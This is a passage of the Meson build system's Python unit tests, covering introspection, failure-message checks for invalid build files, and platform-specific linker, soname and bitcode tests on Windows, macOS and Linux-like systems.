introfile = os.path.join(self.builddir, 'meson-info', 'intro-targets.json')
self.init(testdir)
self.assertPathExists(introfile)
with open(introfile, 'r') as fp:
res_wb = json.load(fp)
res_nb = self.introspect_directory(testfile, ['--targets'] + self.meson_args)
# Account for differences in output
for i in res_wb:
i['filename'] = [os.path.relpath(x, self.builddir) for x in i['filename']]
if 'install_filename' in i:
del i['install_filename']
sources = []
for j in i['target_sources']:
sources += j['sources']
i['target_sources'] = [{
'language': 'unknown',
'compiler': [],
'parameters': [],
'sources': sources,
'generated_sources': []
}]
self.maxDiff = None
self.assertListEqual(res_nb, res_wb)
def test_introspect_dependencies_from_source(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
testfile = os.path.join(testdir, 'meson.build')
res_nb = self.introspect_directory(testfile, ['--scan-dependencies'] + self.meson_args)
expected = [
{
'name': 'threads',
'required': True,
'version': [],
'has_fallback': False,
'conditional': False
},
{
'name': 'zlib',
'required': False,
'version': [],
'has_fallback': False,
'conditional': False
},
{
'name': 'bugDep1',
'required': True,
'version': [],
'has_fallback': False,
'conditional': False
},
{
'name': 'somethingthatdoesnotexist',
'required': True,
'version': ['>=1.2.3'],
'has_fallback': False,
'conditional': True
},
{
'name': 'look_i_have_a_fallback',
'required': True,
'version': ['>=1.0.0', '<=99.9.9'],
'has_fallback': True,
'conditional': True
}
]
self.maxDiff = None
self.assertListEqual(res_nb, expected)
def test_unstable_coredata(self):
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
# just test that the command does not fail (e.g. because it throws an exception)
self._run([*self.meson_command, 'unstable-coredata', self.builddir])
@skip_if_no_cmake
def test_cmake_prefix_path(self):
testdir = os.path.join(self.unit_test_dir, '64 cmake_prefix_path')
self.init(testdir, extra_args=['-Dcmake_prefix_path=' + os.path.join(testdir, 'prefix')])
@skip_if_no_cmake
def test_cmake_parser(self):
testdir = os.path.join(self.unit_test_dir, '65 cmake parser')
self.init(testdir, extra_args=['-Dcmake_prefix_path=' + os.path.join(testdir, 'prefix')])
def test_alias_target(self):
if self.backend is Backend.vs:
# FIXME: This unit test is broken with vs backend, needs investigation
raise unittest.SkipTest('Skipping alias_target test with {} backend'.format(self.backend.name))
testdir = os.path.join(self.unit_test_dir, '66 alias target')
self.init(testdir)
self.build()
self.assertPathDoesNotExist(os.path.join(self.builddir, 'prog' + exe_suffix))
self.assertPathDoesNotExist(os.path.join(self.builddir, 'hello.txt'))
self.run_target('build-all')
self.assertPathExists(os.path.join(self.builddir, 'prog' + exe_suffix))
self.assertPathExists(os.path.join(self.builddir, 'hello.txt'))
def test_configure(self):
testdir = os.path.join(self.common_test_dir, '2 cpp')
self.init(testdir)
self._run(self.mconf_command + [self.builddir])
def test_summary(self):
testdir = os.path.join(self.unit_test_dir, '72 summary')
out = self.init(testdir)
expected = textwrap.dedent(r'''
Some Subproject 2.0
string: bar
integer: 1
boolean: True
My Project 1.0
Configuration
Some boolean: False
Another boolean: True
Some string: Hello World
A list: string
1
True
empty list:
A number: 1
yes: YES
no: NO
coma list: a, b, c
Subprojects
sub: YES
sub2: NO Problem encountered: This subproject failed
''')
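        # Only compare the chunk of output that starts at the first expected
        # line and is exactly as long as the expected summary.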
expected_lines = expected.split('\n')[1:]
out_start = out.find(expected_lines[0])
out_lines = out[out_start:].split('\n')[:len(expected_lines)]
if sys.version_info < (3, 7, 0):
# Dictionary order is not stable in Python <3.7, so sort the lines
# while comparing
self.assertEqual(sorted(expected_lines), sorted(out_lines))
else:
self.assertEqual(expected_lines, out_lines)
def test_meson_compile(self):
"""Test the meson compile command."""
prog = 'trivialprog'
if is_windows():
prog = '{}.exe'.format(prog)
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
self._run([*self.meson_command, 'compile', '-C', self.builddir])
# If compile worked then we should get a program
self.assertPathExists(os.path.join(self.builddir, prog))
self._run([*self.meson_command, 'compile', '-C', self.builddir, '--clean'])
self.assertPathDoesNotExist(os.path.join(self.builddir, prog))
def test_spurious_reconfigure_built_dep_file(self):
testdir = os.path.join(self.unit_test_dir, '74 dep files')
        # Regression test: a spurious reconfigure used to happen when the build
        # directory was inside the source directory.
        # See https://gitlab.freedesktop.org/gstreamer/gst-build/-/issues/85.
srcdir = os.path.join(self.builddir, 'srctree')
shutil.copytree(testdir, srcdir)
builddir = os.path.join(srcdir, '_build')
self.change_builddir(builddir)
self.init(srcdir)
self.build()
# During first configure the file did not exist so no dependency should
# have been set. A rebuild should not trigger a reconfigure.
self.clean()
out = self.build()
self.assertNotIn('Project configured', out)
self.init(srcdir, extra_args=['--reconfigure'])
        # During the reconfigure the file did exist, but it is inside the build
        # directory, so no dependency should have been set. A rebuild should not
        # trigger a reconfigure.
self.clean()
out = self.build()
self.assertNotIn('Project configured', out)
class FailureTests(BasePlatformTests):
'''
Tests that test failure conditions. Build files here should be dynamically
generated and static tests should go into `test cases/failing*`.
This is useful because there can be many ways in which a particular
function can fail, and creating failing tests for all of them is tedious
and slows down testing.
'''
dnf = "[Dd]ependency.*not found(:.*)?"
nopkg = '[Pp]kg-config.*not found'
def setUp(self):
super().setUp()
self.srcdir = os.path.realpath(tempfile.mkdtemp())
self.mbuild = os.path.join(self.srcdir, 'meson.build')
self.moptions = os.path.join(self.srcdir, 'meson_options.txt')
def tearDown(self):
super().tearDown()
windows_proof_rmtree(self.srcdir)
def assertMesonRaises(self, contents, match, *,
extra_args=None,
langs=None,
meson_version=None,
options=None,
override_envvars=None):
'''
        Assert that running meson configure on the specified @contents raises
        an error whose message matches the regex @match.
'''
if langs is None:
langs = []
with open(self.mbuild, 'w') as f:
f.write("project('failure test', 'c', 'cpp'")
if meson_version:
f.write(", meson_version: '{}'".format(meson_version))
f.write(")\n")
for lang in langs:
f.write("add_languages('{}', required : false)\n".format(lang))
f.write(contents)
if options is not None:
with open(self.moptions, 'w') as f:
f.write(options)
o = {'MESON_FORCE_BACKTRACE': '1'}
if override_envvars is None:
override_envvars = o
else:
override_envvars.update(o)
# Force tracebacks so we can detect them properly
with self.assertRaisesRegex(MesonException, match, msg=contents):
# Must run in-process or we'll get a generic CalledProcessError
self.init(self.srcdir, extra_args=extra_args,
inprocess=True,
override_envvars = override_envvars)
def obtainMesonOutput(self, contents, match, extra_args, langs, meson_version=None):
if langs is None:
langs = []
with open(self.mbuild, 'w') as f:
f.write("project('output test', 'c', 'cpp'")
if meson_version:
f.write(", meson_version: '{}'".format(meson_version))
f.write(")\n")
for lang in langs:
f.write("add_languages('{}', required : false)\n".format(lang))
f.write(contents)
# Run in-process for speed and consistency with assertMesonRaises
return self.init(self.srcdir, extra_args=extra_args, inprocess=True)
def assertMesonOutputs(self, contents, match, extra_args=None, langs=None, meson_version=None):
'''
Assert that running meson configure on the specified @contents outputs
something that matches regex @match.
'''
out = self.obtainMesonOutput(contents, match, extra_args, langs, meson_version)
self.assertRegex(out, match)
def assertMesonDoesNotOutput(self, contents, match, extra_args=None, langs=None, meson_version=None):
'''
Assert that running meson configure on the specified @contents does not output
something that matches regex @match.
'''
out = self.obtainMesonOutput(contents, match, extra_args, langs, meson_version)
self.assertNotRegex(out, match)
@skipIfNoPkgconfig
def test_dependency(self):
if subprocess.call(['pkg-config', '--exists', 'zlib']) != 0:
raise unittest.SkipTest('zlib not found with pkg-config')
a = (("dependency('zlib', method : 'fail')", "'fail' is invalid"),
("dependency('zlib', static : '1')", "[Ss]tatic.*boolean"),
("dependency('zlib', version : 1)", "Item must be a list or one of <class 'str'>"),
("dependency('zlib', required : 1)", "[Rr]equired.*boolean"),
("dependency('zlib', method : 1)", "[Mm]ethod.*string"),
("dependency('zlibfail')", self.dnf),)
for contents, match in a:
self.assertMesonRaises(contents, match)
def test_apple_frameworks_dependency(self):
if not is_osx():
raise unittest.SkipTest('only run on macOS')
self.assertMesonRaises("dependency('appleframeworks')",
"requires at least one module")
def test_extraframework_dependency_method(self):
code = "dependency('python', method : 'extraframework')"
if not is_osx():
self.assertMesonRaises(code, self.dnf)
else:
# Python2 framework is always available on macOS
self.assertMesonOutputs(code, '[Dd]ependency.*python.*found.*YES')
def test_sdl2_notfound_dependency(self):
# Want to test failure, so skip if available
if shutil.which('sdl2-config'):
raise unittest.SkipTest('sdl2-config found')
self.assertMesonRaises("dependency('sdl2', method : 'sdlconfig')", self.dnf)
if shutil.which('pkg-config'):
self.assertMesonRaises("dependency('sdl2', method : 'pkg-config')", self.dnf)
with no_pkgconfig():
# Look for pkg-config, cache it, then
# Use cached pkg-config without erroring out, then
# Use cached pkg-config to error out
code = "dependency('foobarrr', method : 'pkg-config', required : false)\n" \
"dependency('foobarrr2', method : 'pkg-config', required : false)\n" \
"dependency('sdl2', method : 'pkg-config')"
self.assertMesonRaises(code, self.nopkg)
def test_gnustep_notfound_dependency(self):
# Want to test failure, so skip if available
if shutil.which('gnustep-config'):
raise unittest.SkipTest('gnustep-config found')
self.assertMesonRaises("dependency('gnustep')",
"(requires a Objc compiler|{})".format(self.dnf),
langs = ['objc'])
def test_wx_notfound_dependency(self):
# Want to test failure, so skip if available
if shutil.which('wx-config-3.0') or shutil.which('wx-config') or shutil.which('wx-config-gtk3'):
raise unittest.SkipTest('wx-config, wx-config-3.0 or wx-config-gtk3 found')
self.assertMesonRaises("dependency('wxwidgets')", self.dnf)
self.assertMesonOutputs("dependency('wxwidgets', required : false)",
"Run-time dependency .*WxWidgets.* found: .*NO.*")
def test_wx_dependency(self):
if not shutil.which('wx-config-3.0') and not shutil.which('wx-config') and not shutil.which('wx-config-gtk3'):
raise unittest.SkipTest('Neither wx-config, wx-config-3.0 nor wx-config-gtk3 found')
self.assertMesonRaises("dependency('wxwidgets', modules : 1)",
"module argument is not a string")
def test_llvm_dependency(self):
self.assertMesonRaises("dependency('llvm', modules : 'fail')",
"(required.*fail|{})".format(self.dnf))
def test_boost_notfound_dependency(self):
# Can be run even if Boost is found or not
self.assertMesonRaises("dependency('boost', modules : 1)",
"module.*not a string")
self.assertMesonRaises("dependency('boost', modules : 'fail')",
"(fail.*not found|{})".format(self.dnf))
def test_boost_BOOST_ROOT_dependency(self):
# Test BOOST_ROOT; can be run even if Boost is found or not
self.assertMesonRaises("dependency('boost')",
"(BOOST_ROOT.*absolute|{})".format(self.dnf),
override_envvars = {'BOOST_ROOT': 'relative/path'})
def test_dependency_invalid_method(self):
code = '''zlib_dep = dependency('zlib', required : false)
zlib_dep.get_configtool_variable('foo')
'''
self.assertMesonRaises(code, ".* is not a config-tool dependency")
code = '''zlib_dep = dependency('zlib', required : false)
dep = declare_dependency(dependencies : zlib_dep)
dep.get_pkgconfig_variable('foo')
'''
self.assertMesonRaises(code, "Method.*pkgconfig.*is invalid.*internal")
code = '''zlib_dep = dependency('zlib', required : false)
dep = declare_dependency(dependencies : zlib_dep)
dep.get_configtool_variable('foo')
'''
self.assertMesonRaises(code, "Method.*configtool.*is invalid.*internal")
def test_objc_cpp_detection(self):
'''
Test that when we can't detect objc or objcpp, we fail gracefully.
'''
env = get_fake_env()
try:
env.detect_objc_compiler(MachineChoice.HOST)
env.detect_objcpp_compiler(MachineChoice.HOST)
except EnvironmentException:
code = "add_languages('objc')\nadd_languages('objcpp')"
self.assertMesonRaises(code, "Unknown compiler")
return
raise unittest.SkipTest("objc and objcpp found, can't test detection failure")
def test_subproject_variables(self):
'''
Test that:
        1. The correct message is printed when a not-required dep is not
           found and the fallback subproject is also not found.
        2. A not-required fallback dependency is not found because the
           subproject failed to parse.
        3. A not-found not-required dep with a fallback subproject outputs the
           correct message when the fallback subproject is found but the
           variable inside it is not.
        4. A fallback dependency is found from the subproject parsed in (3).
        5. The correct message is printed when the .wrap file is missing for
           a sub-subproject.
'''
tdir = os.path.join(self.unit_test_dir, '20 subproj dep variables')
out = self.init(tdir, inprocess=True)
self.assertRegex(out, r"Subproject directory not found and .*nosubproj.wrap.* file not found")
self.assertRegex(out, r'Function does not take positional arguments.')
self.assertRegex(out, r'WARNING:.* Dependency .*subsubproject.* not found but it is available in a sub-subproject.')
self.assertRegex(out, r'Subproject directory not found and .*subsubproject.wrap.* file not found')
self.assertRegex(out, r'Dependency .*zlibproxy.* from subproject .*subprojects.*somesubproj.* found: .*YES.*')
def test_exception_exit_status(self):
'''
Test exit status on python exception
'''
tdir = os.path.join(self.unit_test_dir, '21 exit status')
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(tdir, inprocess=False, override_envvars = {'MESON_UNIT_TEST': '1'})
self.assertEqual(cm.exception.returncode, 2)
self.wipe()
def test_dict_requires_key_value_pairs(self):
self.assertMesonRaises("dict = {3, 'foo': 'bar'}",
'Only key:value pairs are valid in dict construction.')
self.assertMesonRaises("{'foo': 'bar', 3}",
'Only key:value pairs are valid in dict construction.')
def test_dict_forbids_duplicate_keys(self):
self.assertMesonRaises("dict = {'a': 41, 'a': 42}",
'Duplicate dictionary key: a.*')
def test_dict_forbids_integer_key(self):
self.assertMesonRaises("dict = {3: 'foo'}",
'Key must be a string.*')
def test_using_too_recent_feature(self):
# Here we use a dict, which was introduced in 0.47.0
self.assertMesonOutputs("dict = {}",
".*WARNING.*Project targeting.*but.*",
meson_version='>= 0.46.0')
def test_using_recent_feature(self):
# Same as above, except the meson version is now appropriate
self.assertMesonDoesNotOutput("dict = {}",
".*WARNING.*Project targeting.*but.*",
meson_version='>= 0.47')
def test_using_too_recent_feature_dependency(self):
self.assertMesonOutputs("dependency('pcap', required: false)",
".*WARNING.*Project targeting.*but.*",
meson_version='>= 0.41.0')
def test_vcs_tag_featurenew_build_always_stale(self):
'https://github.com/mesonbuild/meson/issues/3904'
vcs_tag = '''version_data = configuration_data()
version_data.set('PROJVER', '@VCS_TAG@')
vf = configure_file(output : 'version.h.in', configuration: version_data)
f = vcs_tag(input : vf, output : 'version.h')
'''
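        # vcs_tag() uses build_always_stale internally; that internal use must
        # not trigger a FeatureNew warning against the project itself.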
msg = '.*WARNING:.*feature.*build_always_stale.*custom_target.*'
self.assertMesonDoesNotOutput(vcs_tag, msg, meson_version='>=0.43')
def test_missing_subproject_not_required_and_required(self):
self.assertMesonRaises("sub1 = subproject('not-found-subproject', required: false)\n" +
"sub2 = subproject('not-found-subproject', required: true)",
""".*Subproject "subprojects/not-found-subproject" required but not found.*""")
def test_get_variable_on_not_found_project(self):
self.assertMesonRaises("sub1 = subproject('not-found-subproject', required: false)\n" +
"sub1.get_variable('naaa')",
"""Subproject "subprojects/not-found-subproject" disabled can't get_variable on it.""")
def test_version_checked_before_parsing_options(self):
'''
https://github.com/mesonbuild/meson/issues/5281
'''
options = "option('some-option', type: 'foo', value: '')"
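        # The bogus option type 'foo' must never be reached: the meson_version
        # check has to fail before the options file is parsed.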
match = 'Meson version is.*but project requires >=2000'
self.assertMesonRaises("", match, meson_version='>=2000', options=options)
def test_assert_default_message(self):
self.assertMesonRaises("k1 = 'a'\n" +
"assert({\n" +
" k1: 1,\n" +
"}['a'] == 2)\n",
r"Assert failed: {k1 : 1}\['a'\] == 2")
def test_wrap_nofallback(self):
self.assertMesonRaises("dependency('notfound', fallback : ['foo', 'foo_dep'])",
r"Dependency \'notfound\' not found and fallback is disabled",
extra_args=['--wrap-mode=nofallback'])
def test_message(self):
self.assertMesonOutputs("message('Array:', ['a', 'b'])",
r"Message:.* Array: \['a', 'b'\]")
def test_warning(self):
self.assertMesonOutputs("warning('Array:', ['a', 'b'])",
r"WARNING:.* Array: \['a', 'b'\]")
def test_override_dependency_twice(self):
self.assertMesonRaises("meson.override_dependency('foo', declare_dependency())\n" +
"meson.override_dependency('foo', declare_dependency())",
"""Tried to override dependency 'foo' which has already been resolved or overridden""")
@unittest.skipIf(is_windows(), 'zlib is not available on Windows')
def test_override_resolved_dependency(self):
self.assertMesonRaises("dependency('zlib')\n" +
"meson.override_dependency('zlib', declare_dependency())",
"""Tried to override dependency 'zlib' which has already been resolved or overridden""")
@unittest.skipUnless(is_windows() or is_cygwin(), "requires Windows (or Windows via Cygwin)")
class WindowsTests(BasePlatformTests):
'''
Tests that should run on Cygwin, MinGW, and MSVC
'''
def setUp(self):
super().setUp()
self.platform_test_dir = os.path.join(self.src_root, 'test cases/windows')
@unittest.skipIf(is_cygwin(), 'Test only applicable to Windows')
def test_find_program(self):
'''
Test that Windows-specific edge-cases in find_program are functioning
correctly. Cannot be an ordinary test because it involves manipulating
PATH to point to a directory with Python scripts.
'''
testdir = os.path.join(self.platform_test_dir, '8 find program')
# Find `cmd` and `cmd.exe`
prog1 = ExternalProgram('cmd')
self.assertTrue(prog1.found(), msg='cmd not found')
prog2 = ExternalProgram('cmd.exe')
self.assertTrue(prog2.found(), msg='cmd.exe not found')
self.assertPathEqual(prog1.get_path(), prog2.get_path())
# Find cmd with an absolute path that's missing the extension
cmd_path = prog2.get_path()[:-4]
prog = ExternalProgram(cmd_path)
self.assertTrue(prog.found(), msg='{!r} not found'.format(cmd_path))
# Finding a script with no extension inside a directory works
prog = ExternalProgram(os.path.join(testdir, 'test-script'))
self.assertTrue(prog.found(), msg='test-script not found')
# Finding a script with an extension inside a directory works
prog = ExternalProgram(os.path.join(testdir, 'test-script-ext.py'))
self.assertTrue(prog.found(), msg='test-script-ext.py not found')
# Finding a script in PATH
os.environ['PATH'] += os.pathsep + testdir
# Finding a script in PATH w/o extension works and adds the interpreter
# (check only if `.PY` is in PATHEXT)
if '.PY' in [ext.upper() for ext in os.environ['PATHEXT'].split(';')]:
prog = ExternalProgram('test-script-ext')
self.assertTrue(prog.found(), msg='test-script-ext not found in PATH')
self.assertPathEqual(prog.get_command()[0], python_command[0])
self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py')
# Finding a script in PATH with extension works and adds the interpreter
prog = ExternalProgram('test-script-ext.py')
self.assertTrue(prog.found(), msg='test-script-ext.py not found in PATH')
self.assertPathEqual(prog.get_command()[0], python_command[0])
self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py')
# Ensure that WindowsApps gets removed from PATH
path = os.environ['PATH']
if 'WindowsApps' not in path:
username = os.environ['USERNAME']
appstore_dir = r'C:\Users\{}\AppData\Local\Microsoft\WindowsApps'.format(username)
path = os.pathsep + appstore_dir
path = ExternalProgram._windows_sanitize_path(path)
self.assertNotIn('WindowsApps', path)
def test_ignore_libs(self):
'''
Test that find_library on libs that are to be ignored returns an empty
array of arguments. Must be a unit test because we cannot inspect
ExternalLibraryHolder from build files.
'''
testdir = os.path.join(self.platform_test_dir, '1 basic')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Not using MSVC')
        # Assert the full set so that anyone extending ignore_libs is forced to
        # update this test as well.
self.assertEqual(set(cc.ignore_libs), {'c', 'm', 'pthread', 'dl', 'rt', 'execinfo'})
for l in cc.ignore_libs:
self.assertEqual(cc.find_library(l, env, []), [])
def test_rc_depends_files(self):
testdir = os.path.join(self.platform_test_dir, '5 resources')
# resource compiler depfile generation is not yet implemented for msvc
env = get_fake_env(testdir, self.builddir, self.prefix)
depfile_works = env.detect_c_compiler(MachineChoice.HOST).get_id() not in {'msvc', 'clang-cl', 'intel-cl'}
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Test compile_resources(depend_file:)
# Changing mtime of sample.ico should rebuild prog
self.utime(os.path.join(testdir, 'res', 'sample.ico'))
self.assertRebuiltTarget('prog')
# Test depfile generation by compile_resources
# Changing mtime of resource.h should rebuild myres.rc and then prog
if depfile_works:
self.utime(os.path.join(testdir, 'inc', 'resource', 'resource.h'))
self.assertRebuiltTarget('prog')
self.wipe()
if depfile_works:
testdir = os.path.join(self.platform_test_dir, '12 resources with custom targets')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of resource.h should rebuild myres_1.rc and then prog_1
self.utime(os.path.join(testdir, 'res', 'resource.h'))
self.assertRebuiltTarget('prog_1')
def test_msvc_cpp17(self):
testdir = os.path.join(self.unit_test_dir, '45 vscpp17')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Test only applies to MSVC-like compilers')
try:
self.init(testdir)
except subprocess.CalledProcessError:
# According to Python docs, output is only stored when
# using check_output. We don't use it, so we can't check
# that the output is correct (i.e. that it failed due
# to the right reason).
return
self.build()
def test_install_pdb_introspection(self):
testdir = os.path.join(self.platform_test_dir, '1 basic')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Test only applies to MSVC-like compilers')
self.init(testdir)
installed = self.introspect('--installed')
files = [os.path.basename(path) for path in installed.values()]
self.assertTrue('prog.pdb' in files)
def _check_ld(self, name: str, lang: str, expected: str) -> None:
if not shutil.which(name):
raise unittest.SkipTest('Could not find {}.'.format(name))
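        # Look up the environment variable that selects the linker for this
        # language (plus any deprecated alias), point it at `name`, and check
        # the id of the linker that gets detected.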
envvars = [mesonbuild.envconfig.BinaryTable.evarMap['{}_ld'.format(lang)]]
# Also test a deprecated variable if there is one.
if envvars[0] in mesonbuild.envconfig.BinaryTable.DEPRECATION_MAP:
envvars.append(
mesonbuild.envconfig.BinaryTable.DEPRECATION_MAP[envvars[0]])
for envvar in envvars:
with mock.patch.dict(os.environ, {envvar: name}):
env = get_fake_env()
try:
comp = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
except EnvironmentException:
raise unittest.SkipTest('Could not find a compiler for {}'.format(lang))
self.assertEqual(comp.linker.id, expected)
def test_link_environment_variable_lld_link(self):
env = get_fake_env()
comp = getattr(env, 'detect_c_compiler')(MachineChoice.HOST)
if isinstance(comp, mesonbuild.compilers.GnuLikeCompiler):
raise unittest.SkipTest('GCC cannot be used with link compatible linkers.')
self._check_ld('lld-link', 'c', 'lld-link')
def test_link_environment_variable_link(self):
env = get_fake_env()
comp = getattr(env, 'detect_c_compiler')(MachineChoice.HOST)
if isinstance(comp, mesonbuild.compilers.GnuLikeCompiler):
raise unittest.SkipTest('GCC cannot be used with link compatible linkers.')
self._check_ld('link', 'c', 'link')
def test_link_environment_variable_optlink(self):
env = get_fake_env()
comp = getattr(env, 'detect_c_compiler')(MachineChoice.HOST)
if isinstance(comp, mesonbuild.compilers.GnuLikeCompiler):
raise unittest.SkipTest('GCC cannot be used with link compatible linkers.')
self._check_ld('optlink', 'c', 'optlink')
@skip_if_not_language('rust')
def test_link_environment_variable_rust(self):
self._check_ld('link', 'rust', 'link')
@skip_if_not_language('d')
def test_link_environment_variable_d(self):
env = get_fake_env()
comp = getattr(env, 'detect_d_compiler')(MachineChoice.HOST)
if comp.id == 'dmd':
raise unittest.SkipTest('meson cannot reliably make DMD use a different linker.')
self._check_ld('lld-link', 'd', 'lld-link')
def test_pefile_checksum(self):
try:
import pefile
except ImportError:
if is_ci():
raise
raise unittest.SkipTest('pefile module not found')
testdir = os.path.join(self.common_test_dir, '6 linkshared')
self.init(testdir)
self.build()
# Test that binaries have a non-zero checksum
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
cc_id = cc.get_id()
ld_id = cc.get_linker_id()
dll = glob(os.path.join(self.builddir, '*mycpplib.dll'))[0]
exe = os.path.join(self.builddir, 'cppprog.exe')
for f in (dll, exe):
pe = pefile.PE(f)
msg = 'PE file: {!r}, compiler: {!r}, linker: {!r}'.format(f, cc_id, ld_id)
if cc_id == 'clang-cl':
# Latest clang-cl tested (7.0) does not write checksums out
self.assertFalse(pe.verify_checksum(), msg=msg)
else:
# Verify that a valid checksum was written by all other compilers
self.assertTrue(pe.verify_checksum(), msg=msg)
def test_qt5dependency_vscrt(self):
'''
Test that qt5 dependencies use the debug module suffix when b_vscrt is
set to 'mdd'
'''
# Verify that the `b_vscrt` option is available
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if 'b_vscrt' not in cc.base_options:
raise unittest.SkipTest('Compiler does not support setting the VS CRT')
# Verify that qmake is for Qt5
if not shutil.which('qmake-qt5'):
if not shutil.which('qmake') and not is_ci():
raise unittest.SkipTest('QMake not found')
output = subprocess.getoutput('qmake --version')
if 'Qt version 5' not in output and not is_ci():
raise unittest.SkipTest('Qmake found, but it is not for Qt 5.')
# Setup with /MDd
testdir = os.path.join(self.framework_test_dir, '4 qt')
self.init(testdir, extra_args=['-Db_vscrt=mdd'])
# Verify that we're linking to the debug versions of Qt DLLs
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('build qt5core.exe: cpp_LINKER.*Qt5Cored.lib', contents)
self.assertIsNotNone(m, msg=contents)
@unittest.skipUnless(is_osx(), "requires Darwin")
class DarwinTests(BasePlatformTests):
'''
Tests that should run on macOS
'''
def setUp(self):
super().setUp()
self.platform_test_dir = os.path.join(self.src_root, 'test cases/osx')
def test_apple_bitcode(self):
'''
Test that -fembed-bitcode is correctly added while compiling and
-bitcode_bundle is added while linking when b_bitcode is true and not
when it is false. This can't be an ordinary test case because we need
to inspect the compiler database.
'''
testdir = os.path.join(self.platform_test_dir, '7 bitcode')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.id != 'clang':
raise unittest.SkipTest('Not using Clang on OSX')
# Try with bitcode enabled
out = self.init(testdir, extra_args='-Db_bitcode=true')
# Warning was printed
self.assertRegex(out, 'WARNING:.*b_bitcode')
# Compiler options were added
for compdb in self.get_compdb():
if 'module' in compdb['file']:
self.assertNotIn('-fembed-bitcode', compdb['command'])
else:
self.assertIn('-fembed-bitcode', compdb['command'])
build_ninja = os.path.join(self.builddir, 'build.ninja')
# Linker options were added
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('LINK_ARGS =.*-bitcode_bundle', contents)
self.assertIsNotNone(m, msg=contents)
# Try with bitcode disabled
self.setconf('-Db_bitcode=false')
# Regenerate build
self.build()
for compdb in self.get_compdb():
self.assertNotIn('-fembed-bitcode', compdb['command'])
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('LINK_ARGS =.*-bitcode_bundle', contents)
self.assertIsNone(m, msg=contents)
def test_apple_bitcode_modules(self):
'''
Same as above, just for shared_module()
'''
testdir = os.path.join(self.common_test_dir, '152 shared module resolving symbol in executable')
# Ensure that it builds even with bitcode enabled
self.init(testdir, extra_args='-Db_bitcode=true')
self.build()
self.run_tests()
def _get_darwin_versions(self, fname):
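        # Parse `otool -L` output: the second line carries the compatibility
        # and current versions of the library.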
fname = os.path.join(self.builddir, fname)
out = subprocess.check_output(['otool', '-L', fname], universal_newlines=True)
m = re.match(r'.*version (.*), current version (.*)\)', out.split('\n')[1])
self.assertIsNotNone(m, msg=out)
return m.groups()
@skipIfNoPkgconfig
def test_library_versioning(self):
'''
Ensure that compatibility_version and current_version are set correctly
'''
testdir = os.path.join(self.platform_test_dir, '2 library versions')
self.init(testdir)
self.build()
targets = {}
for t in self.introspect('--targets'):
targets[t['name']] = t['filename'][0] if isinstance(t['filename'], list) else t['filename']
self.assertEqual(self._get_darwin_versions(targets['some']), ('7.0.0', '7.0.0'))
self.assertEqual(self._get_darwin_versions(targets['noversion']), ('0.0.0', '0.0.0'))
self.assertEqual(self._get_darwin_versions(targets['onlyversion']), ('1.0.0', '1.0.0'))
self.assertEqual(self._get_darwin_versions(targets['onlysoversion']), ('5.0.0', '5.0.0'))
self.assertEqual(self._get_darwin_versions(targets['intver']), ('2.0.0', '2.0.0'))
self.assertEqual(self._get_darwin_versions(targets['stringver']), ('2.3.0', '2.3.0'))
self.assertEqual(self._get_darwin_versions(targets['stringlistver']), ('2.4.0', '2.4.0'))
self.assertEqual(self._get_darwin_versions(targets['intstringver']), ('1111.0.0', '2.5.0'))
self.assertEqual(self._get_darwin_versions(targets['stringlistvers']), ('2.6.0', '2.6.1'))
def test_duplicate_rpath(self):
testdir = os.path.join(self.unit_test_dir, '10 build_rpath')
        # We purposely pass a duplicate rpath to Meson, in order
        # to ascertain that Meson does not call install_name_tool
        # with duplicate -delete_rpath arguments, which would
        # make it error out during installation.
env = {"LDFLAGS": "-Wl,-rpath,/foo/bar"}
self.init(testdir, override_envvars=env)
self.build()
self.install()
def test_removing_unused_linker_args(self):
testdir = os.path.join(self.common_test_dir, '108 has arg')
env = {'CFLAGS': '-L/tmp -L /var/tmp -headerpad_max_install_names -Wl,-export_dynamic'}
self.init(testdir, override_envvars=env)
@unittest.skipUnless(not is_windows(), "requires something Unix-like")
class LinuxlikeTests(BasePlatformTests):
'''
Tests that should run on Linux, macOS, and *BSD
'''
def test_basic_soname(self):
'''
Test that the soname is set correctly for shared libraries. This can't
be an ordinary test case because we need to run `readelf` and actually
check the soname.
https://github.com/mesonbuild/meson/issues/785
'''
testdir = os.path.join(self.common_test_dir, '4 shared')
self.init(testdir)
self.build()
lib1 = os.path.join(self.builddir, 'libmylib.so')
soname = get_soname(lib1)
self.assertEqual(soname, 'libmylib.so')
def test_custom_soname(self):
'''
Test that the soname is set correctly for shared libraries when
a custom prefix and/or suffix is used. This can't be an ordinary test
case because we need to run `readelf` and actually check the soname.
https://github.com/mesonbuild/meson/issues/785
'''
testdir = os.path.join(self.common_test_dir, '25 library versions')
self.init(testdir)
self.build()
lib1 = os.path.join(self.builddir, 'prefixsomelib.suffix')
soname = get_soname(lib1)
self.assertEqual(soname, 'prefixsomelib.suffix')
def test_pic(self):
'''
Test that -fPIC is correctly added to static libraries when b_staticpic
is true and not when it is false. This can't be an ordinary test case
because we need to inspect the compiler database.
'''
